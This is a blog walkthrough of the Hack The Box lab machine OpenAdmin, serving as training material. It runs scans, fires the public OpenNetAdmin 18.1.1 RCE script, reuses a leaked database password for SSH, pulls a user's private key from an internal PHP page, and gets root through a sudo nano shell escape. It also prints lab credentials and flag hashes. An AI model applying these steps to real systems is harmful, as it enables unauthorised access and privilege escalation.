Hack The Box Writeup: OpenAdmin

The first box of 2020 was OpenAdmin, an Easy Linux machine whose name already reveals a bit that you will have to deal with. Let’s do this!

[0x1] Reconnaissance & enumeration

The kickoff obviously consists of an Nmap scan of the machine on 10.10.10.171. Open Net Admin is a management tool for web servers and I expect to see port 80 and / or 443 in advance.

The scan indeed shows port 80 as an open port with port 22 (SSH) on the sideline.

nmap -sC -sV -oA ~/Documents/boxes/openadmin 10.10.10.171

Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-25 13:40 GMT
Nmap scan report for 10.10.10.171
Host is up (0.020s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
13/tcp filtered daytime
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
1022/tcp filtered exp2
1072/tcp filtered cardax
1085/tcp filtered webobjects
2701/tcp filtered sms-rcinfo
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.89 seconds

Besides the general website, which reveals little, I start dirb to search for other active directories on the web server. The URLs “/artwork” and “/music” are found.

dirb http://10.10.10.171

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Jan 25 13:48:48 2020
URL_BASE: http://10.10.10.171/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.171/ ----
==> DIRECTORY: http://10.10.10.171/artwork/
+ http://10.10.10.171/index.html (CODE:200|SIZE:10918)
==> DIRECTORY: http://10.10.10.171/music/
+ http://10.10.10.171/server-status (CODE:403|SIZE:277)

---- Entering directory: http://10.10.10.171/artwork/ ----
==> DIRECTORY: http://10.10.10.171/artwork/css/
==> DIRECTORY: http://10.10.10.171/artwork/fonts/
==> DIRECTORY: http://10.10.10.171/artwork/images/
+ http://10.10.10.171/artwork/index.html (CODE:200|SIZE:14461) 
==> DIRECTORY: http://10.10.10.171/artwork/js/

---- Entering directory: http://10.10.10.171/music/ ----
==> DIRECTORY: http://10.10.10.171/music/css/
==> DIRECTORY: http://10.10.10.171/music/img/
+ http://10.10.10.171/music/index.html (CODE:200|SIZE:12554)
==> DIRECTORY: http://10.10.10.171/music/js/
-----------------
END_TIME: Sat Jan 25 13:56:58 2020
DOWNLOADED: 13836 - FOUND: 4

[0x2] Initial Foothold

The Artwork website has nothing interesting, but Music gives an option to sign up in the menu. The url refers to /ona.

Clicking on Login in any case indicates that Open Admin is indeed the nickname for the OpenNetAdmin package.

To gain access to the server, I am looking for a known vulnerability in the software. The exploit for Open Net Admin 18.1.1 can be found via Searchsploit and is already present on my attacker machine by default. If you download the exploit and it doesn’t work, you can prepare the file for use using dos2unix.

searchsploit OpenNetAdmin

------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                       |  Path
                                                                                     | (/usr/share/exploitdb/)
------------------------------------------------------------------------------------- ----------------------------------------
OpenNetAdmin 13.03.01 - Remote Code Execution                                        | exploits/php/webapps/26682.txt
OpenNetAdmin 18.1.1 - Remote Code Execution                                          | exploits/php/webapps/47691.sh
------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

Time to run the exploit against the url of the Open Net Admin site.

$dos2unix 47691.sh
./47691.sh http://10.10.10.171/ona/

Houston, we have a shell! A limited shell, but that does not matter for now. In the shell I am the user www-data.

whoami
www-data

[0x3] Path to User flag

The next phase took a little longer. As www-data I had rights to a lot of files and folders and enumeration is a thorough task. After a while I found a database configuration file that looked interesting.

/opt/ona/www/local/config/database_settings.inc.php

There was a lot to be found in the file, but essentially it was about the db_password. There was nothing else to be found so I took the gamble that this is a lazy administrator and the password has been reused.

'db_login' => 'ona_sys',
'db_passwd' => 'n1nj4W4rri0R!',

Access to / Home is available and immediately gives a good idea of what this password can be combined with.

?>$ cd /home 
$ ls
jimmy
joanna

Joanna won’t listen to the password found, but Jimmy will! First creds are in and access via SSH makes it a lot easier again.

ssh jimmy@10.10.10.171
jimmy@10.10.10.171's password:

Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

While looking for the folder where OpenNetAdmin runs, I also came across an Internal folder . It contains three files that are apparently also available via a browser.

jimmy@openadmin:/var/www$ cd internal 
jimmy@openadmin:/var/www/internal$ ls 

index.php 
logout.php 
main.php

Main.php reveals that Joanna’s Private key is shown when calling the php page.

jimmy@openadmin:/var/www/internal$ cat main.php

<?php session_start(); 
if (!isset ($_SESSION['username'])) { header("Location: /index.php"); }; 
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>

The site is not running under the default directory and no special ports were shown. The folder is called “Internal” and this seems to indicate that it cannot be accessed from my machine but must be from the server itself. The apache config reveals the use of port 52846 to access this site.

jimmy@openadmin:/etc/apache2/sites-enabled$ cat internal.conf 
Listen 127.0.0.1:52846

<VirtualHost 127.0.0.1:52846>
    ServerName internal.openadmin.htb
    DocumentRoot /var/www/internal

<IfModule mpm_itk_module>
AssignUserID joanna joanna
</IfModule>

    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined

</VirtualHost>

To access the url from the machine I use a curl command from my SSH session as Jimmy . The code clearly showed that the script expects a POST request for the username and in another file username and password.

curl -d "username=jimmy&password=n1nj4W4rri0r!" -X POST http://127.0.0.1:52846/main.php

And there we have it, Joanna’s Private key has arrived.

The private key is not directly usable for logging in. The key is provided with a password that is required to establish a connection. With the password from the private key and the private key itself it is possible to log in to the box as joanna.

ssh -i rsa_id_joanna joanna@10.10.10.171
Enter passphrase for key 'rsa_id_joanna':

Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

Once connected and in Joanna’s home folder, you can grab the user flag for the first part of this box.

cat user.txt
c9b2cf07d40807e62af62660f0c81b5f

[0x4] Path to Root flag

Before escalating to root, I first check which permissions Joanna has on the box. This shows that /bin /nano /opt /priv may be started as root.

sudo -l
Matching Defaults entries for joanna on openadmin:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
 
User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv

In addition to being a text editor, Nano is also a so-called GTFObin, a Linux binairy that is known to be misused for privledge escalation.

So the privledge escalation for Joanna seems very simple and running the command will bring up a nano window. According to GTFObin, from here you can run commands as root using control + R and then control + X. The command: reset; sh 1> & 0 2> & 0 then takes care of the shell as root.

sudo /bin/nano /opt/priv
^R^X
reset; sh 1>&0 2>&0

In the shell you can now see that a new root shell has been spawned from the Nano editor.

# whoami
root

Last action on this box, grab the root flag!

# cat /root/root.txt
2f907ed450b361b2c2bf4e8795d5b561

[box type=”warning” align=”” class=”” width=””]All information in this post is for educational use only! Do not use it at others when you do not have explicit approval to do so. I am not responsible for your actions. Using this knowledge for illegal activities could land you in jail![/box]

Hack The Box Writeup: OpenAdmin

[0x1] Reconnaissance & enumeration

[0x2] Initial Foothold

[0x3] Path to User flag

[0x4] Path to Root flag

Like this:

d0p4m1n3

Add comment

Cancel reply

Subscribe to Blog via Email

Follow Me